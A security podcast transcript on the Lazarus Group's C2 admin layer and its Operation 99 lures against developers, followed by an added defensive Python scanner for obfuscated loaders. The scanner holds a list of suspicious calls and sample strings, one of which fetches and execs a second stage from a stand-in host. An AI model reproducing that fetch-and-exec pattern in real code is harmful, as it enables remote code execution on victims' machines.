Security researchers have found an admin layer for the Lazarus Group. If you're not aware of them, they are North Korea's threat actors. There's some interesting information behind that, as well as some good news: we have what looks like some more protections in Android that mirror some of iOS's security measures.
Let's talk about it in today's episode. Today we are facing an unprecedented array of data breaches, hacking attempts, and surges in digital crime. Why is there such a widespread amount, and how little is noticed in our everyday lives? Malware, dark sites, brute forcing, zero days, script kiddies, and nation-state hackers are all on the rise.
Learn more about the threats we face and gain a bit more knowledge than yesterday. Hey guys, welcome back to another episode. I'm your host, Cipherceval. If you're on YouTube, please do me the favor and hit that like, subscribe, and bell notification icon. And if you're on a podcast platform like Apple Podcasts or Spotify, please give us a follow and a 5-star rating if you think we deserve it.
So, I have two articles for you today, with one supporting article. But before we even dive into the article, let's talk about Lazarus to give some context. Lazarus is one of North Korea's main threat actor groups, one of their main cyber groups. They generally operate a lot around cryptocurrency, and they try to fundraise, right?
North Korea is not exactly the most profitable country in the world when it comes to their normal imports and exports and their legitimate, above-board activities. But where they do seem to be very active is in cybercrime initiatives. And with that, let's go over some of the admin layer stuff that was found, what that means for you and where that's interesting, as well as some more context on them.
So the article is by Dark Reading: Researchers uncover Lazarus Group admin layer for C2 servers. The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang. To give some context, a C2 server, or command and control server, is generally what botnets and other kinds of malware use to understand what they need to do, get resources from, etc.
A lot of the time, when you have different kinds of payloads that go onto a machine, you don't have an all-in-one. You can, but a lot of the time lately you don't have an all-in-one threat that gets installed on a victim machine. You have a loader, which then brings in other stuff, like different functionalities and modules.
And from there, it keeps talking to the command and control to know how to update itself, where to exfil data to, and stuff like that. So if you want to think of it, it's essentially like a main headquarters for the malware. An infection can look something like this: you install the loader.
The loader then reaches out, determines what modules it wants to install and how it can obfuscate its behavior. Then let's say it installs something like a keylogger module and a cryptocurrency-stealing module. There are different kinds of modules, but let's go with those two for now, right?
So the keylogger module gets installed, and that starts listening to all your keystrokes and looking for passwords and such, and then the stealer will look for your cryptocurrency wallets, any kind of cookies, or stuff in your paste buffer, your paste environment, I guess, from copy and paste, right?
And it'll grab those and exfiltrate them, or send them up to the command and control server, which is how they get your data. I'm bringing it up because the researchers found the admin layer, the control of the command and control servers, for the threat actor. Going on into the article:
An ongoing investigation into recent attacks by North Korea's Lazarus Group on cryptocurrency entities and software developers worldwide has uncovered a hidden administrative layer that the threat actor has been using to centrally manage the campaign's command and control infrastructure, its C2 infrastructure.
The investigation by researchers at SecurityScorecard showed Lazarus using the newly discovered infrastructure to maintain direct oversight over compromised systems, control payload delivery on them, and efficiently manage exfiltrated data. Significantly, the threat actor is using the same web-based admin platform in other campaigns, including one involving the impersonation of IT workers, the security vendor found.
So, the significance of this, right? They've essentially uncovered the brains behind the C2 infrastructure. For every botnet, and for a lot of malware, there's always a C2 infrastructure that has to be there, because you need some kind of control. Granted, you have stuff like worms, whose whole thing is just spread and destroy, but a lot of things, especially the more recent sophisticated attacks, have some kind of C2 infrastructure. Think ransomware, right?
The ransomware has to talk to somewhere to let them know an infection has occurred, and then to be able to communicate for decryption and payment and stuff like that, and commands can get sent for decrypting or destroying data, or exfilling certain kinds of data. We've been seeing that more with ransomware. Not that Lazarus is in ransomware right now; they're much more in the cryptocurrency game, but that's to give the context there.
Now, elaborate operational security. Though the threat actor has implemented elaborate operational security measures to try and evade attribution, SecurityScorecard said it was able to tie the campaign and infrastructure to North Korea with a high degree of confidence. Anytime you're talking about cyber security or the cyber world, attribution is a major thing among threat actors, because when you attribute an attack, you're essentially saying, hey, we have a high degree of confidence that it was this threat actor, and that's significant, right?
Because if you think about it, what country wants to take the fault for some cyber attack, which is ultimately a crime? What country wants to willfully take that blame? So, they want to make it look like some other country is the one doing the attack. Of course, North Korea would want either China, or Russia, or Brazil, or one of the other countries that have different cyber operations.
Not too sure about Brazil's cyber threats, but, you know, we usually talk about Russia and China a lot. But what if we could make their threat actors be the ones to take the fall for North Korea? So that's what happens: threat actors don't want the attribution to go to them.
Why? Because what country wants to say, yeah, we hacked you, sorry. It's just better to stay in the shadows for a lot of this stuff. The analysis makes it evident that Lazarus was orchestrating a global operation targeting the cryptocurrency industry and developers worldwide, SecurityScorecard said in a report this week. The campaigns resulted in hundreds of victims downloading and executing the payloads.
While in the background, the exfiltrated data was being siphoned back to Pyongyang. Again, when we're talking about different campaigns and specifically what Lazarus likes to do, they tend to do stealers, right? Because North Korea doesn't have a very robust trade infrastructure with other countries, you know, they're not exactly the most above-board, legitimate kind of country.
Because of that, they do a lot of cybercrime to try to fund their operations, fund their missile programs, etc. And cryptocurrency just so happens to be the kind of money that you don't need to pass through something like a central bank. Cryptocurrency by itself is decentralized, right? And the beautiful part about that for everyday people is that it's harder to censor, it's easier to exchange, and there's less bureaucracy around it. But the really beneficial part for cybercriminals is that it's distributed, there's no one to control it, and it's, you know, somewhat easy to steal if you know how, and that's what we're seeing threat actors like Lazarus doing. They're stealing money.
Now, SecurityScorecard discovered Phantom Circuit, the name by which it is tracking Lazarus Group's newly discovered admin layer, while conducting follow-up investigations involving Operation 99, a malicious campaign that it recently uncovered targeting the cryptocurrency industry and developers globally.
So here's where I'm going to pause this article for a second. We'll come back in a minute. There is an article by SecurityScorecard actually talking about Operation 99, which is something I thought was really cool, and I thought you guys would benefit from getting that context.
Now, Operation 99, according to the SecurityScorecard article called Operation 99: North Korea's Cyber Assault on Software Developers. You have essentially the Lazarus Group not only trying to do stealers, or info-stealers, and different malware, but they're also trying to do some social engineering by taking advantage of developers, the trust, and the position that developers find themselves in.
So, on January 9th, the SecurityScorecard STRIKE Team uncovered Operation 99, a cyber attack by the Lazarus Group, North Korea's state-sponsored hacking unit. The campaign targets software developers looking for freelance Web3 and cryptocurrency work.
If you thought fake job offers from the group's Operation Dream Job campaign were bad, this latest move is a masterclass in deception, sophistication, and malicious intent. So I'm not too familiar with Operation Dream Job. There's always a million things happening and it's hard to keep up with everything, which is why I'm here talking about it.
Now, for those of you who are listening and not watching the screen, whether on the podcast or if you have the YouTube video in the background, they do show a map of the world with the victims. And interestingly enough, it seems like Italy is one of the highest. It looks like 137 victims have been hit there for this campaign from Lazarus.
So why software developers? Why now? I will sum up what happened for you. I won't go through the article, so we can switch back to the other one. But Operation 99 is essentially a way to have Web3 cryptocurrency developers download a malicious open source repository. And that open source repository is what actually has the malicious payload that connects to the command and control servers, downloads malware, and does really nasty stuff to the developers.
Now, for those of you who are listening, maybe you're an analyst, maybe you're just curious about cyber security, maybe you just like listening to this kind of stuff and you have a completely different job; it doesn't matter. The importance of it is that developers tend to have a lot of trust when it comes to software.
And what I mean by that is developers will go to GitHub and GitLab and other repositories, and they will download a piece of code because it can help them do something complicated. When you start thinking about time zone libraries, file manipulation, rendering maps, or anything like that, you get into some really complicated stuff, and sometimes it's just better to download something that's already been tried, tested, and bug-checked, right?
If you're very used to writing, say, code for data pipelines, and all of a sudden you need to go write this Solidity thing, which is one of the Web3 frameworks that runs off Ethereum, then you may not know it. So you start to download a bunch of different things and a bunch of different packages, and that's where they're taking advantage of this.
In software there is the idea of a supply chain attack. And just like in the real world, whenever you affect the supply chain, you affect everything down the line. So say you have a developer who's maintaining this obscure library that maybe everyone downloads but no one really understands, and there's a lot of them, or a library that's very niche or very useful, or a wrapper; there's a million different kinds of libraries that get installed.
If you can get that one developer who has that one library that's used everywhere, and he or she has probably been writing it in their free time, and they get infected, you have a bunch of things that come with that in a supply chain attack, because they got infected.
If that gets released, then anyone who's installed it gets infected. And you can see where that goes, right? So now a company that hasn't been hacked directly has software that's been backdoored, and that software got backdoored because of a library that got maliciously exploited, unintentionally on the maintainer's part, and you now have access to a huge number of victims.
Now, I'm talking about this because the Lazarus Group seems to be going in that direction. Part of this is that they're trying to steal crypto from the Web3 developers, but they then have a foothold in what eventually could be a pivot to supply chain attacks. And I find that very concerning.
Now there’s some funny things like the C2 servers are hosted by Stark Industries, LLC. Uh, which if, uh, there’s any Marvel fans, you know, Stark Industries. Um, but the one thing I found kind of cool and interesting is they’re using heavily obfuscated Python scripts. I find that interesting because Python is still not a super ubiquitous language.
It’s much more ubiquitous than it was, say, five years ago, ten years ago. Especially with everyone using it as kind of like their first language in university. Which I have my own opinions on. I did several years of C before I ever moved on to other different kinds of language. And I kind of like that method.
But hey, everyone to their own. So, they’re using obfuscated Python scripts, which essentially means you have a Python program that has a bunch of jumbled up, uh, wording and other stuff so you can’t tell what it’s doing right away. And they tend to do some really cool, um, dynamically adjusting of the malware.
All this to kind of say, That not only are they trying to be elusive, not only are they stealing cryptocurrency from just people who are into crypto, but they’re also trying to hit the developers. And when you try to hit the developers, that’s where the damage could be amplified greatly. Again, because you’re looking at supply chain attacks, you’re looking at what kind of information do they have, where are they, and stuff like that.
Jumping back to the Dark Reading article that we were talking about: Victims who fall for the scams are directed to clone a seemingly benign but harmful open source GitHub repository. The cloned repository connects to Lazarus Group's C2 infrastructure, which the threat actor has been using to sneak data-stealing malware into the victim's environment.
As part of the campaign, Lazarus Group has been inserting obfuscated backdoors into legitimate software products, including authentication apps and cryptocurrency software, and trying to trick developers into running them in their environments. SecurityScorecard estimates that more than 230 victims have downloaded the malicious payloads in the North Korean threat actor's latest campaign.
Again, this is where there are a bunch of red alerts, red alarms going off, man, right? If they're doing these kinds of things, you know, they have backdoors, they're trying to get into supply chains and other apps to try to get stealers into different corporate environments, that's insane. Because they're moving from "steal crypto" to trying to get more than just the obviously valuable stuff, right?
If you can steal things like configurations, you can look for vulnerabilities, and now you have somewhat of a zero day, even though it's not a bug in the code, it's a problem with the infrastructure setup. You can have them steal proprietary code and other data, right? So they could make clones
of legitimate software. And then you also have the aspect of, well, if they can steal information and other access, that's also valuable in and of itself. Now, the motivation is twofold: cryptocurrency theft and infiltration of corporate networks. Ryan Sherstobitoff, Senior Vice President of Threat Intelligence at SecurityScorecard, says, More often than not, developers who fall victim to Lazarus Group lures end up executing the cloned code on their corporate devices and in their work environments.
The payloads are designed to exfiltrate development secrets. You have a lot of companies that are very protective of their secret sauce, of how the program is written, of how their infrastructure is set up. And for good reason, right? Sometimes the differentiation between company A and company B is that they have a better infrastructure setup.
They both have similar functionality, similar features, but maybe company A handles 10 times the amount of load as company B. And that's more than just code; it goes into the way that the code is also dealing with environments, right? I won't bore you with the technical details right now, but you have stuff like microservices.
You have, of course, cloud technologies, but then you also have things like the ability to ramp up multiple instances, which is something you've seen with AWS and other cloud providers. And what that ultimately means is you have code that can create copies of itself to do a piece of work. And then you spin that up 10, 20, 30 times, however many times the system can scale, and it does that much more work, and it's more powerful than, say, something like multithreading, which is one program doing multiple things at once. You can essentially scale horizontally,
which means you can have computer A, computer B, computer C, computer D, computer E, all running the software. So now you have more computers coming online, and it's easier to scale horizontally than it is vertically, because you can only give so much CPU and RAM to a single machine. There are limitations to processors and RAM, versus if you do it horizontally, you just keep adding machines, and then you can create pipelines and stuff.
Now, I'm saying that because if company A has a sophisticated setup like that and company B does not, well, now North Korea can turn around and pretty much copy them and do whatever they want to create a clone of it, if they wanted to go down that direction. The more information they have, the scarier they can be.
Now, SecurityScorecard researchers found Lazarus members using Astrill VPNs to connect to an intermediate proxy network registered with a freight company in Khasan, Russia. They then used the proxy network to connect to Operation 99 C2 infrastructure in an elaborate attempt to hide their tracks. The C2 servers themselves were hosted on infrastructure registered with the most likely fictional Stark Industries LLC.
So going back to what I was saying about attribution, right? If they're trying to set themselves up to operate out of Russia, they might be trying to make it look like Russian threat actors are the ones doing these attacks, when in reality it's the North Korean threat actors. SecurityScorecard assesses with high confidence that the IPs used to connect to the C2s were merely a relay proxy, used to obfuscate the true origin, the company wrote in its report this week. The adversary was establishing a secondary session after connecting to the VPN with the proxy.
So they were using a VPN to connect to Russia, and then from Russia they were using a proxy to go somewhere else, right? So you're doing a hop, a chain-hopping effect.
And you do this because now there are more places where you'd have to go and pull logs from and do all this other stuff. Versus you at home: if you access google.com and you're not using a VPN or a proxy or anything, Google can see the origin IP through the network traffic. And the more hops you do, the harder it is to track that, because now they have a VPN going into this computer over here, and this computer over here is then using a proxy to send a request.
Now that's different from just proxy to proxy, because a proxy, a forward proxy, will sometimes just manipulate the packet to resend it somewhere else. Now, by doing a VPN, if they're logging into another computer, they're essentially accessing a different system somewhere else.
And then if they're accessing a proxy from there, they're bouncing that traffic to somewhere else. Again, there are a lot of things you can do to hide your traffic. There are still ways to find it, there are timing attacks and other things, but the more complications you add, the harder it is to do without having some really high-level access or, you know, some sophisticated access. Think governments with access to infrastructure, logs, and other stuff, assuming logs are even being kept.
Now, Phantom Circuit is the operational network behind the scenes that leads directly back to Pyongyang, Sherstobitoff says. It is also the same proxy network, he adds, that Lazarus used in another campaign, where members used stolen identities to impersonate IT workers to try and secure jobs at the organizations they want to infiltrate.
Again, Lazarus has been at this for a while. They're heavily known for their cryptocurrency theft, and they're heavily known for IT scams and ways to, you know, just get money. Ultimately, the threat actor seems to be extremely interested in making money. And I don't blame them, right? North Korea is not exactly a nation flush with a lot of cash.
But that’s it for this dark, dark reading article. Let’s go ahead and jump into the next one by Android Authority. So in an article by Android Authority, here’s how advanced protection mode in Android 16 will protect your data. Now, nothing is ever foolproof, but kudos to Android for trying to put in some more stuff for us to kind of make it safer.
Turning on advanced protection will block side loading and 2G connectivity in Android 16. Now, to give a bit of context before we jump into the article. IOS already has a lot of safety features for their lockdown mode. Now lockdown mode isn’t necessarily something that everyone wants to activate, but if you’re a journalist, a high target official, um, an elected official, someone who hackers may specifically want to target, not because.
They could have money, but because they’re known, right? Think celebrities, think, um, journalists of dissenting countries, think opponents of different regimes. There’s a myriad of reasons why you may be wanting to get, why you may get targeted by cyber security actors or threat actors. And because of that, IOS, a while back, introduced a lockdown mode.
Google did something for Android back in 2017, the article touches on that. But now it seems like they’re rolling out even more stuff for that in Android 16, which is one of the upcoming Android operating system versions. If you believe you’re at high risk of being targeted by hackers, or you desire an additional layer of security, you can enroll in Google’s Advanced Protection Program.
The program improves security by requiring you to use a security key or passkey to sign into your Google account. Blocking you from downloading harmful files and more enrolled users also benefit from beefed up security on their Android devices with Android 16, introducing further security enhancements.
I will save you the whole article and just touch on some pieces of it that were really cool. So in 2017, Google introduced the Advanced Protection Program, which allowed different things to happen on the device, but ultimately it was a way for those at high risk of being hacked to try to minimize their risks.
One way you can do that is by preventing apps from being installed from outside the Google Play Store. Now, for my iOS users, or for my Android users who only use the Play Store, there is other stuff like F-Droid and other ways that you can load up different applications on your device. Now, you may be wondering, why would you want to do that?
Well, there are a lot of reasons, but sometimes it isn't anything more complicated than wanting an app that isn't on the Play Store. And F-Droid and these other ones are different marketplaces that allow you to do that. Now, there are ultimately a lot of things you can do with Android, and sideloading makes that possible.
But, on the negative side, sideloading is also a way that threat actors have been loading malware onto unsuspecting Android devices. Because the sideload bypasses the Google Play Store, you're no longer relying on Google scanning that app and hopefully catching any malicious activity that could be happening.
And that Android that you’re signing the APK or the application that you’re sideloading may not do what you think or may not do what you want it to do. And with the new 20, with the new Android 16, this is one of the things that is kind of cool. Now, the article states that when examining Android 16 beta one, they discovered how to manually enable it.
I’ll kind of go, I’ll put the article in the link if you want to go look how. But the cool part is that you can manually enable the mode. And then you have stuff like allow from this source to install an app and it’s great out and gives you a prevented by advanced protection notice. This is really cool for those who want to put it on because now it’s just another piece of mind, right?
You’re not going to be able to have something siloed because it blocks it completely. It’s no longer just oh well I’m being careful No device or no app could sideload anything either because it’s been blocked by the operating system Another cool thing is that the advanced protection mode will prevent 2g connectivity 2G is one of the older methods of cell towers, right?
So, you know, 3G, you know, 4G, you know, 5G, 2G is older and has been sunsetted in most places. But most devices have no need to access to, for a 2G network. But there is an attack, a cyber attack, where if you can trick a device to going down to a 2G network, you can essentially access a traffic. I think it’s pretty much plain text.
And you can intercept and monitor traffic. Like if it was just an open HTTP connection, as far as I remember. And the cool part is that with Android 16, it’s no longer going to allow 2g connections to occur. Because again, most two G’s all over the world should be pretty much discontinued, right? I think even 3g got discontinued and everyone is mostly on 4g for North America.
I’m not sure about Europe and those counterparts. And one of the other cool parts about Android 16 protection mode is something called memory tagging extension. And it essentially helps protect against memory safety bugs, which can occur, and is one of the more common vulnerabilities in the Android ecosystem.
Um, now, all this to say, the advanced protection program does have trade offs, like, you know, potential performance impacts, and a bit more clunky, right? If you’re trying to sideload something, well, guess what? You can’t. You’re 100 percent relying on the Play Store. Which is something that a lot of iOS users are not super happy about, because they can’t get certain apps, or Because they’re locked down to the Apple ecosystem.
But again, trade offs. Now it is important to note this. I will read this last article or this last paragraph. Google hasn’t formally announced this new advanced protection mode. So it’s inclusion in the final Android 16 release isn’t guaranteed. Given the evidence we compiled though, we likely think it’ll make it in.
Blocking 2G and enabling MTE, or the Memory Tagging Extension, are valuable enhancements, but Android Protection Mode’s true potential lies in the new API, which will allow apps to check enrollment status and implement further security measures. This effectively transforms the advanced protection program into a one click solution for enhancing the security of not only your Google account, but also any participating Android apps.
And here’s where I find it cool. So for my developers who are listening, this is really cool because now you can check if a user is in this advanced protection mode. You know that the user who’s using your app is probably being targeted. So you can do things like double checking the environment. You can do things like making sure everything’s fully encrypted.
You’re not putting any secrets or anything out that could expose. And there’s just a lot of different things you can do, but. It’s cool for the IT admins who are listening because now you have a more centralized location to try to lock down the device in question. I know a lot of IT admins kind of stress over devices because if the device gets compromised or lost, they could have access into the network, right?
A lot of employees will have access to email, maybe they have a VPN or something else installed that lets them access the network. I know there’s a lot of devices or device policies that allow and A corporation or an entity to essentially remote lock and wipe a device. But this is just another layer that makes it harder to do anything because now you’d have to physically steal the device, right?
It’s no longer that you sideloaded something and got access to the device that way. But guys, I thought these were cool. I wanted to bring it up with you. Um, ultimately security is. Sometimes only as good as the person and in other times it’s as good as the tech because in this in this place They’re kind of forcing you to do stuff to protect yourself.
But again, we’ll see if this comes out in Android 16 This has been your host Cipherceval. Thank you for tuning in and I’ll catch you in the next one!
Note: This is a transcript of the episode.
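Editor's addition (not part of the episode): the transcript describes the same lure twice, once for Operation 99 and once in the Dark Reading summary: a developer is asked to clone a repository that looks benign, and an obfuscated Python script inside it decodes a blob or fetches a second stage over the network and hands the result to exec. A practitioner who has just cloned an unfamiliar repo can check for exactly that pattern before running anything. The script below is an added example, not code from the episode, Dark Reading or SecurityScorecard, and it carries no real Lazarus indicators: the SAMPLES it scans are constructed, harmless stand-ins (the URL example.invalid is hypothetical), and the call weights and the entropy and length thresholds are assumptions to tune rather than published detection logic.

```python
"""Triage a cloned repo for obfuscated Python loaders. Added example, not code from
the episode, Dark Reading or SecurityScorecard; SAMPLES are constructed, harmless
stand-ins that are parsed, never executed."""
import ast, base64, math, re
from collections import Counter
from dataclasses import dataclass, field
from pathlib import Path

# Assumed weights: dynamic execution counts most; decoding and network calls count
# less on their own, because honest code uses them all the time.
SUSPICIOUS_CALLS = {
    "exec": 2, "eval": 2, "compile": 1, "__import__": 1, "marshal.loads": 2,
    "base64.b64decode": 1, "zlib.decompress": 1, "codecs.decode": 1, "os.system": 1,
    "urllib.request.urlopen": 1, "requests.get": 1, "subprocess.Popen": 1,
}
LONG_STRING = 200   # chars; shorter literals rarely hold a whole stage
HIGH_ENTROPY = 4.5  # bits/char; English prose ~4.2, base64 or random bytes ~5.5-6
FLAG_THRESHOLD = 3  # one decode plus one exec already warrants a look

@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: list = field(default_factory=list)
    @property
    def flagged(self) -> bool:
        return self.score >= FLAG_THRESHOLD

def shannon_entropy(text: str) -> float:
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0

def dotted_name(node):
    # `a.b.c(...)` -> "a.b.c"; None when the callee is not a plain dotted name.
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def alias_map(tree) -> dict:
    """Undo `import x as y` / `from m import n as k`, a cheap obfuscation step."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            aliases.update({a.asname: a.name for a in node.names if a.asname})
        elif isinstance(node, ast.ImportFrom) and node.module:
            aliases.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names})
    return aliases

def scan_source(path: str, source: str) -> Finding:
    finding = Finding(path)
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # Legacy syntax, deliberately mangled, or not Python at all: text sweep instead.
        finding.score += 1
        finding.reasons.append("does not parse as Python 3")
        for name, weight in SUSPICIOUS_CALLS.items():
            if re.search(r"\b" + re.escape(name) + r"\s*\(", source):
                finding.score += weight
                finding.reasons.append(f"call {name}")
        return finding
    aliases = alias_map(tree)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and (name := dotted_name(node.func)):
            head, _, rest = name.partition(".")
            head = aliases.get(head, head)
            # Canonical name; `from builtins import exec as run` must still read as exec.
            name = re.sub(r"^builtins\.", "", f"{head}.{rest}" if rest else head)
            if name in SUSPICIOUS_CALLS:
                finding.score += SUSPICIOUS_CALLS[name]
                finding.reasons.append(f"call {name} (line {node.lineno})")
        elif isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            text = node.value if isinstance(node.value, str) else node.value.decode("latin-1")
            if len(text) >= LONG_STRING and shannon_entropy(text) >= HIGH_ENTROPY:
                finding.score += 2
                finding.reasons.append(f"{len(text)}-char high-entropy literal (line {node.lineno})")
    return finding

def scan_files(files: dict) -> list:
    """Scan {path: source}; most suspicious first."""
    return sorted((scan_source(p, s) for p, s in files.items()), key=lambda f: -f.score)

def scan_directory(root: str) -> list:
    """Scan every .py under root, e.g. the repo a 'recruiter' just asked you to clone."""
    return scan_files({str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="replace")
                       for p in Path(root).rglob("*.py")})

# Constructed stand-ins. BLOB is opaque filler, not a payload; the URL is hypothetical.
BLOB = base64.b64encode(bytes(range(256)) * 2).decode()
SAMPLES = {
    "utils/config.py": "import json\ndef load(path):\n    with open(path) as fh:\n        return json.load(fh)\n",
    "setup_env.py": ("import base64 as b, zlib\nfrom builtins import exec as run\n"
                     f"_p = '{BLOB}'\nrun(zlib.decompress(b.b64decode(_p)))\n"),
    "scripts/bootstrap.py": ("import urllib.request\ncode = urllib.request.urlopen('http://example.invalid/stage2').read()\n"
                             "exec(compile(code, '<stage2>', 'exec'))\n"),
}

if __name__ == "__main__":
    for f in scan_files(SAMPLES):
        print(f"{'FLAG' if f.flagged else 'ok  '} score={f.score:<2} {f.path}")
        for reason in f.reasons:
            print(f"      - {reason}")
```

Run it as-is to triage the constructed SAMPLES, or call scan_directory() on a fresh checkout before you run its setup script. A FLAG is a reason to read the file, not proof of malice: build scripts, vendored minified data and embedded certificates also produce long high-entropy literals, and a loader can defeat the alias resolution with getattr tricks, which is why the weights and thresholds are assumptions you tune and why the unparseable-file fallback deliberately errs toward noise.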
Connect with us:
Newsletter: https://follow.exploitbrokers.com
Twitter: @ExploitBrokers
Medium: https://medium.com/@exploitbrokers
TikTok: https://www.tiktok.com/@exploitbrokers
References & Sources
- Lazarus C2 Infrastructure: https://www.darkreading.com/cyberattacks-data-breaches/researchers-uncover-lazarus-admin-layer-c2-servers
- Operation 99: https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/
- Advanced Protection Mode: https://www.androidauthority.com/android-16-advanced-protection-mode-3518368/